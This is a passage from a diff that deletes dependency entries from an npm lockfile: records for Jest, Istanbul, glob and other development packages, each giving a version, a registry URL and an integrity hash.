"sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - } - }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true - }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": 